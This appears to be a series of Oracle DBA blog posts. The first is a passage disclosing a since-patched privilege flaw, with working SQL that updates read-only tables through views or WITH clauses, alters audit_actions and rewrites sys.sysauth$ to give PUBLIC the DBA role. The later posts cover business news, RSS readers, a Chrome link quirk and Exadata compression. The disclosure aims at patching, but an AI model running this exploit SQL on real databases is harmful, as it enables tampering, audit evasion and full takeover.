Let’s set up a test table in the usra account.
create table t1 (col_a varchar2(10) not null);
insert into t1 (col_a) values ('Original');
--
commit;
--
grant select on t1 to usrb;

We now have a table with a single row that usrb can only read from, or so we would think. Let us first create a very basic view and try to update it.
drop view view1;
create view view1 as select * from usra.t1;
update view1 set col_a = 'Whoops1';

So that didn’t work. Or rather, the view was created but the update failed. That is how it should be, we have no update access on the table.

Let’s now try to create a view on that view, which we then update, to see what happens if we add just a little bit of complexity.

drop view view2;
create view view2 as select * from view1 where col_a in (select max (col_a) from view1 group by col_a);
update view2 set col_a = 'Whoops2';

This update suddenly works (before the above-mentioned CPU). So our meticulously granted privileges are overridden by a view with a sub-select on the same view. Not good.

Could the sub-select be simplified? Does it need to select from the same view and is an aggregation needed to make this bug expose itself?

drop view view3;
create view view3 as select * from view1 where 1 in (select 1 from dual);
update view3 set col_a = 'Whoops3';

Apparently it could not be simplified enough to just do a sub-select from dual. On to other possible simplifications.

What if we just read a hard-coded value from the first row in the table, would that work?
drop view view4;
create view view4 as select * from view1 where 1 in (select 1 from view1 where rownum = 1);
update view4 set col_a = 'Whoops4';

Yup, that is enough to break through the privileges.

How about just using a select without even having to have the right to create a view?
update
(with x as (select * from usra.t1) select * from x) t1
set col_a = 'Whoops5';

Ouch. That too was possible. So all it takes is select access on a table and we can update it. How do we stop someone from abusing this, when a pure select right with no ability to create objects is enough? You see why we pulled the original blog post? This was, for a time, something that would be very hard to defend your database against.

How about using it to update things in the data dictionary? Yes, that too is possible. Some things are available to any user, such as audit_actions.

update
(with x as (select * from audit_actions) select * from x) t1
set name = 'Mathias was here';

This update also works. So auditing can be changed, probably not a good thing if you trust your audit_actions table.

How about escalating the privileges we have (or rather, that anyone has)? Yes, that is also possible with a bit of knowledge.

select * from sys.sysauth$
where grantee# = (select user_id from all_users where username = 'HR')
and rownum = 1;

Here we steal the identifiers of a privilege held by the HR user, probably a privilege that will not be missed for a long time in most databases. With this we will turn PUBLIC into a proper DBA, meaning that any account can do almost anything in the database.

update
(with x as (select * from sys.sysauth$ where grantee# = 103 and privilege# = -264 and sequence# = 1551)
select * from x) t1
set grantee# = 1     -- hand the stolen grant to PUBLIC
   ,privilege# = 4;  -- and make it the DBA role

(The grantee#, privilege#, and sequence# values in the where clause come from the select above and will differ per database.)

Just like that we have given ourselves and everyone else DBA access. Now we can do whatever we want including covering our tracks in most databases.

So I ask again, are you *really* sure that your database is secure?

This is scary stuff, and it only goes to show that even a mature product needs to be kept current with patches. If you are not on a CPU from this year, PLEASE give it high priority to make that happen today.

And PLEASE do not test this in production. If you do and your DBA catches you, he will lecture you forever, if not report you up the chain of command. But please do spread the word that this issue exists and needs to be plugged ASAP.


It’s a Miracle

Thu, 2013-12-05 14:20

Time to get back into blogging. I stopped a while ago and the reason was two-fold. As I was leaving my job at Kentor AB, I wanted to avoid any concerns about what I wrote while my three-month-long two-week notice played out. The other reason was that once I had left, life got really busy, both with work for my client and with the new adventure I had embarked on.

The new adventure is to bring the Miracle brand to Sweden. I will try to build up an Oracle database focused team here in Stockholm, based on the success Miracle A/S has had in Denmark. Yes, it is as exciting as it is scary for someone who has lived their life in medium to large scale consulting practices.

However, I have always had a big admiration for the guys who started Miracle and what they have achieved. Getting a chance to bring the same style and quality to my home market of Stockholm and Sweden was just an offer that was too good to pass up. That is the kind of opportunity most of us will only get once or twice in a career. This one came at a time when it could just about be made to work with everything else that was going on. The one thing that may not be optimal is having a new house built at the same time. Actually, that makes it completely not optimal. But the phrase I keep repeating to others who wonder when the best time to get started is, is “there is no time such as the present”, so I took my own advice for once.

So now the work is on getting the Oracle practice going. Or rather, it is going, it just needs a few more legs. And by legs I mean consultants.

Next up, however, is partying with our colleagues down in Copenhagen, close to the headquarters. Tomorrow evening the Christmas party kicks off. Who knows when it will end. :-)

This blog will soon return to a more technical program, though probably with some posts on interesting aspects of starting up a company. I’m sure the next year will teach us a lot about how to do that.

About that, this hiring business… When is the best time to add more people to a small company, and how do we manage risk? Well… ehhh… Yeah… That’s right: there is no best time, but there is no time such as the present.


Google reader is dead, long live RSS

Tue, 2013-06-25 04:00

So calling Google Reader dead may be a bit premature, but Google’s announcement of their intention to kill their baby all but killed it. On Monday it is RIP for the Reader. I’ve gone from disbelief, to mourning the loss, to a search for a replacement that best emulates what Google Reader does.

In the end I decided to not just replace it with a new tool providing the same exact features, only with a different name.

If I had to find a different tool, I might as well try to find something better. The fact is that although Google Reader was one of my favorite Google tools, I did not use it. Yes, it is a bit odd that I’m writing a post about replacing a tool I didn’t use. And when I say that I didn’t use it, I use the term “did not” very recklessly. The fact is that I could not read all the blogs I follow without it. Google Reader had, however, turned into an infrastructure piece for me. I used it to collect the posts and keep track of what I had read, but my tool of choice for reading was Reeder. Unless you are familiar with it, it may seem like I just referred to Google Reader again, but it is spelled differently. It is a wonderful tool for reading blogs that uses Google Reader to manage the subscriptions and lets Google Reader track which posts are read and which are not.

If Reeder is such a wonderful app, why not keep using it? At first I thought of abandoning it as Google Reader was going away. But it turns out Reeder will continue to work (or so they claim). It supports Feedbin, and possibly even Feedly in the future. There has not been much talk about it on their own website or even on their Twitter account. There are lots of fans asking what is going on, and scarcely anything from @reederapp themselves.

I started thinking about how I consume text these days. I do still surf on a computer, but only when looking for something. I prefer reading on my iPad. My workflow has actually changed such that when I find a great article or blog post, I flip it so I can later read it in Flipboard on the iPad. If the article is worth saving for the future after having read it, I add it to Evernote. As that is my workflow for things I do not have to read right now, why should my workflow for reading blogs be any different? After all, I read them when time allows.

After that epiphany I took a look at Flipboard, wondering if I could get a similar tool for reading blogs on the iPad. It turns out I can; they have seized the opportunity Google created. You can now read your blogs in the tool we all love. Getting my blogs into Flipboard has made them seem so much more enjoyable. It integrates with Google Reader, so it imports all the blogs you have there and lets you follow the same blogs.

The one thing that can be confusing is that after opting to read your blogs in Flipboard, you will want to go into the settings for Google Reader in Flipboard and possibly turn on showing the number of unread items, marking posts you read in Flipboard as read, and showing only unread posts. I have them all set to ON and it works very well with the way I want to read my blogs.

For me, reading blogs on the iPad is so much more enjoyable than trying to catch up in the browser on the computer. The latter never happens, and I tend to fall far behind and have to set aside a few hours to catch up. Since moving my blog reading to Flipboard I have stayed current on all the blogs I read.

If you haven’t found a way to read your blogs yet that you really love, give Flipboard a try. I think you’re gonna love it.


Too much chrome

Wed, 2013-06-19 07:00

You know how it is, when you have that feeling. You are on top of your game. You have a few quick brush strokes to add to a system to make it more dynamic. You have all the small needed changes in your head and you know it is just gonna work. You sit down for some quality time with your computer and the application builder. It’s gonna be fun and you will get to bask in the glow of your success before the day is over. Yup, that is the feeling I’m talking about.

Then there is that other feeling, the one we want to avoid. You know the kind. When you have an easy fix to do. It all goes well until it doesn’t. And then, nothing. You turn the knob this way, nothing. You turn the knob that way, nothing. You turn it up, you turn it down. No matter what, the same freaking result. And it is the wrong result. Time goes by; what was embarrassing after 15 minutes is annoyingly embarrassing after a couple of hours. Yes, that is the feeling I’m referring to.

Worst of all is of course when the first feeling turns into the second feeling. That is an afternoon that is sure to suck, and the more it sucks the more you get annoyed that you cannot see what is sure to be a very obvious mistake.

One day a few weeks ago I had this happen to me for the umpteenth time. Not with the same issue of course, but with one of those ridiculous things that just throws you out of your flow. What was a magical afternoon changed to one where I felt like a complete beginner.

It all started very innocently with me needing to add a table where I could store the locations of the different places a tab should point to. So I had an application item, I had a process that would populate it on new instances (sessions), and I had referenced that application item in the link target. The target returned was set to be “127.0.0.1:8080”. A target as good as any…

It didn’t show up in the link from the tab. The value was however available, as it could be displayed in a region on the same page. What the…

Could it really be that APEX creates the HTML text for the tab before the application process runs? It just didn’t make sense, and a test of hard-coding the value to “abc” in the application process proved that it did in fact run first.

Could it be that a value passed in from the process was treated differently for tabs or application processes? I doubted it, but facing odd issues one tends to consider all kinds of illogical things. But hardcoding “abc” in the process once again showed that it came through to the tab.

What on earth. A friend tested the same page on his Mac and (fortunately?) got the same exact result. So it wasn’t my browser that was acting up.

Now we were really stretching and started looking at the page rendered in Safari and Firefox. What on earth, the link showed up just fine in them?

We were considering a bug in APEX. I have read about things they have had to do to make IE, Chrome, Firefox, Safari, and Opera work well with APEX applications. Could there be a bug in there with how links with dynamic values were treated? It certainly was possible, if it weren’t for the fact that some links showed up just fine. The “abc” one looked like a page on the same IP address as the APEX server when looking at where Chrome wanted to send us. So it really wasn’t reasonable that APEX would have a bug related just to localhost addresses.

After some more coffee it dawned on me: maybe this wasn’t APEX at all. Maybe this was a “feature” of Chrome. After a peek at the source for the rendered page, the text “127.0.0.1:8080” was found in the link attribute for the tab. So APEX rendered it like I expected, but Chrome didn’t honor it as a link.

It turns out that if the href is just text, Chrome assumes it is a relative document located downstream from the DocumentRoot. However, if it cannot be parsed as such a path, Chrome will not allow the link to be used. What was needed was to put http:// in front of the address. That should of course be there for the URL to be well formed; I just expected it to show up when hovering over the link anyway, just as it does in other browsers.
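A minimal sketch of the fix, assuming a hypothetical application item TAB_TARGET set from the on-new-instance application process; the only change needed was to include the scheme in the stored value:

    -- Hypothetical application process populating the tab's link target.
    -- Without the scheme Chrome parses the value as a relative path and
    -- renders a dead link; with it the link behaves as in other browsers.
    :TAB_TARGET := 'http://127.0.0.1:8080/';
    -- :TAB_TARGET := '127.0.0.1:8080/';  -- this variant gave the empty link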

It would be nice if Chrome, rather than just linking to “blank”, would link to a page somewhere that said it was a malformed URL. However, the solution took seconds to implement while the troubleshooting took WAY longer than it should have. Even worse, two senior troubleshooters were stumped on this for a very long time.

So if you end up with an empty link in your APEX application, or on any other web page for that matter, you know that it is most likely the result of a malformed URL being rendered in Chrome.

So yes, I started off with the first feeling, feeling good about myself, and quickly entered the downward spiral of the second. That day never really got back up to the first happy feeling again. Happy with having solved the issue, but not nearly feeling on top of my game when the day ended. Oh well, there will be more days to convince myself that I might be on top of my game (at least sometimes).


Improving data move on EXADATA V

Wed, 2013-06-12 07:00

Wrap-up

This is the last post in this series and I’ll not introduce anything new here, but rather just summarise the changes explained and talk a bit about the value the solution delivers to the organisation.

Let’s first review the situation we faced before implementing the changes.

Writing the log records to the database caused such contention, with parallel writes from many different sources, that it introduced severe bottlenecks, to the point where the logging feature had to be turned off for days at a time. This was not acceptable, but short of shutting down the whole system, which would put lives in immediate danger, it was the only option available. Even if the writing had been fast enough, the moving of data was taking over twice the time available, and we were fast approaching the point where moving the data written in 24 hours to the historical log store would itself take more than 24 hours. That would of course have resulted in an ever growing backlog, even if the data move ran 24×7. On top of that, the data took up 1.5 TB of disk space, costing a lot of money and raising concerns about our ability to move it to EXADATA.

To resolve the contention that was crippling the overall system during business hours, we changed the table setup to have no primary keys, no foreign keys, and no indexes. We also partitioned the tables such that we get one partition per day.
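One way to get a table like that is interval partitioning, sketched below with made-up names and columns; Oracle then creates one partition per day automatically, with no nightly DDL needed:

    CREATE TABLE log_current (
      log_time  TIMESTAMP     NOT NULL,
      source_id NUMBER,
      message   VARCHAR2(4000)
    )
    PARTITION BY RANGE (log_time)
    INTERVAL (NUMTODSINTERVAL(1, 'DAY'))
    (PARTITION p_first VALUES LESS THAN (TIMESTAMP '2013-01-01 00:00:00'));
    -- Deliberately no primary key, foreign keys, or indexes: every index
    -- maintained during the parallel writes was a point of contention.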

To make the move from operational tables to historical tables faster, we opted to have both in the same instance on EXADATA. This allowed us to use partition exchange to swap the partition out of the operational table and into the historical table. This took just a second, as all we did was update some metadata recording which table the partition belongs to. Note that this ultra-fast operation replaced a process that used to take around 16 hours, in a window where we only had 6.5 hours, and the time it took kept growing as the business grew.
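The swap could look roughly like this (table and partition references are hypothetical); as both tables live in the same instance, each exchange is a pure metadata update, which is why it completes in about a second regardless of how many rows the partition holds:

    -- Swap yesterday's partition out of the operational table into a
    -- plain staging table, then swap the staging table into the
    -- corresponding partition of the historical table.
    ALTER TABLE log_current
      EXCHANGE PARTITION FOR (TIMESTAMP '2013-06-11 00:00:00')
      WITH TABLE log_stage WITHOUT VALIDATION;
    ALTER TABLE log_hist
      EXCHANGE PARTITION FOR (TIMESTAMP '2013-06-11 00:00:00')
      WITH TABLE log_stage WITHOUT VALIDATION;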

Finally, to reduce the space consumed on disk we used HCC – Hybrid Columnar Compression. This is an EXADATA-only feature for compressing data such that columns with repeating values get a very good compression ratio. We went from 1.5 TB to just over 100 GB. This means that even with no purging of data, it would take us over five years to get back to the amount of storage this used to require.
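As a one-line sketch (the table name is made up), the compression level is simply declared on the historical table; how and when the compression actually kicks in is covered in post four of the series:

    -- Data subsequently loaded with direct path operations into log_hist
    -- is stored in Hybrid Columnar Compressed format.
    ALTER TABLE log_hist COMPRESS FOR QUERY HIGH;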

So, in summary:

  • During business hours we use 20% of the computing power it used to take, and even less of the wall clock time.
  • The time to move data to the historical store was reduced from around 16 hours to less than one second.
  • Disk space requirement was reduced from 1.5 TB to just over 100 GB.

And all of this was done without changing one line of code. In fact, there was no rebuild, no configuration change, nothing at all needed for this drastic improvement to work with all the different systems that were writing to these log tables.

One more thing to point out here is that all these changes were done without using traditional SQL. The fact that it is an RDBMS does not mean that we have to use SQL to resolve every problem; in fact, SQL is often not the best tool for the job. It is also worth noting that these kinds of optimisations cannot be done by an ORM – it is not what they do. This is what your performance or database architect needs to do for you.

For easy lookup, here are links to the posts in this series.

  1. Introduction
  2. Writing log records
  3. Moving to history tables
  4. Reducing storage requirements
  5. Wrap-up (this post)

Improving data move on EXADATA IV

Wed, 2013-06-05 07:00

Reducing storage requirements

In the previous post in this series I talked about how we sped up the move of data from operational to historical tables from around 16 hours down to just seconds. You can find that post here.

The last area of concern was the amount of storage this took and would take in the future. As it was currently taking up 1.5 TB, it would claim a fairly large chunk of the available storage, which raised concerns for capacity planning and for the availability of space on the EXADATA for other systems we planned to move there.

We set out to both estimate the maximum disk utilisation this data would reach and see what we could do to minimize the disk space needed. There were two considerations: minimize disk utilisation while at the same time not making query times worse. Both were of course to be achieved without adding a large load to the system, especially not during business hours.

The first attempt was to just compress one of the tables with traditional table compression. After running the test across the set of tables we worked with, we saw a compression ratio of 57%. Not bad, not bad at all. However, this was now going to run on an EXADATA. One of the technologies that is EXADATA only (to be more technically correct, only available with Oracle-branded storage) is HCC, which stands for Hybrid Columnar Compression. I will not explain in this post how it differs from normal compression, but as the name indicates the compression is organised around columns rather than rows as traditional compression is. This can achieve even better results; at least that is the theory, and the marketing for EXADATA says this is part of its magic sauce. Time to take it out for a spin.
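A test along those lines could look like this (all names made up): create copies of a representative day with direct path loads, one per compression type, and compare the resulting sizes:

    -- CTAS writes with direct path, so the data actually gets compressed.
    CREATE TABLE log_test_basic COMPRESS
      AS SELECT * FROM log_hist PARTITION (p20130610);
    CREATE TABLE log_test_hcc COMPRESS FOR QUERY HIGH
      AS SELECT * FROM log_hist PARTITION (p20130610);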

After having set it up for our tables, with the exact same content as in the normal compression test, we had a compression rate of 90%. That is, 90% of the needed storage was eliminated by using HCC. I tested the different options available for the compression (query high and low as well as archive high and low) and ended up choosing query high. My reasoning was that the improvement of query high over query low was large enough that the extra processing power needed was well worth it. I got identical results with query high and archive low: they took the same time, resulted in the same size dataset, and querying took the same time. I could not tell them apart in any way. Archive high, however, is a different beast. It took about four times the processing power to compress, and querying took longer and used more resources too. As this is a dataset I expect the users to want to run more and more queries against once they see it can be done in a matter of seconds, my choice was easy: query high was easily the best for us.
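Comparing the footprint of the variants is then just a matter of looking at the segment sizes (same hypothetical names as above):

    -- Size of each test table, in megabytes.
    SELECT segment_name, ROUND(SUM(bytes)/1024/1024) AS mb
    FROM   user_segments
    WHERE  segment_name IN ('LOG_TEST_BASIC', 'LOG_TEST_HCC')
    GROUP  BY segment_name;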

How do we implement it then? Setting a table to compress for query high and then running normal inserts against it does not achieve a lot. There are some savings, but they are marginal compared to what can be achieved. For HCC to kick in, we need direct path writes to occur. As this data is written once and never updated, we can compress everything once the processing day is over. Thus, we set up a job to run thirty minutes past midnight that compresses the previous day's partition. It is just one extra line in the job that moves the partitions, described in the previous post in this series.
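That extra line is in essence a rewrite of the partition with a direct path operation, sketched here with hypothetical names and a date literal standing in for whatever yesterday was:

    -- Rewrites yesterday's partition; the direct path move is what makes
    -- HCC compress the data.
    ALTER TABLE log_hist
      MOVE PARTITION FOR (TIMESTAMP '2013-06-11 00:00:00')
      COMPRESS FOR QUERY HIGH;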

Compressing one very active day takes less than two minutes. In fact, the whole job to move and compress has run in less than 15 seconds for each day's data since we took this solution live a while back. That is time well worth spending for the 90% saving in disk consumption we achieve.

It is worth noting that while HCC is an EXADATA feature not available in most Oracle databases, traditional compression is. Some forms of it require licensing, but it is there, so while you may not get the same ratio as described in this post, you can still get a big reduction in disk space consumption using the compression method available to you.

With this, the last piece of the puzzle fell into place and there were no concerns left with the plan for fixing the issues the organisation had with managing this log data. The next post will summarise and wrap up what was achieved with the changes described in this series.

